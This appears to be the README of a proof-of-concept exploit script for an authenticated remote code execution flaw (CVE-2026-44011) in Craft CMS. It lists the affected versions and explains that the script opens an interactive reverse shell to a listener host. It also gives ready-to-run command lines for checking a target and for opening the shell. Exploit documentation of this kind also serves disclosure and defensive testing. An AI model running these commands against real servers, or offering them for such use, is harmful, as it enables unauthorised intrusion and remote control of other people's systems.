
PoC RCE autenticato per Craft CMS per CVE-2026-44011
Questo script Python adatta l'attacco descritto nell'avviso di sicurezza di Craft CMS. Un utente Craft autenticato può raggiungere un percorso di configurazione del layout dei campi vulnerabile e causare l'esecuzione di comandi sul server.
Le versioni interessate sono Craft CMS >=4.0.0, <4.17.12 e >=5.0.0, <5.9.18.
Lo script richiede curl su entrambi gli host. Utilizza Bash sul server. Anche Python3 sul server fornisce un PTY interattivo; in sua assenza, la shell ripiega su una connessione di base.
# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check
# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'
Craft CMS attribuisce a @precicom-vincent-tl il ruolo di scopritore di CVE-2026-44011. I dettagli della vulnerabilità e il payload di esempio sono pubblicati nell'avviso di Craft CMS GHSA-qrgm-p9w5-rrfw. Questo script adatta la tecnica pubblicata.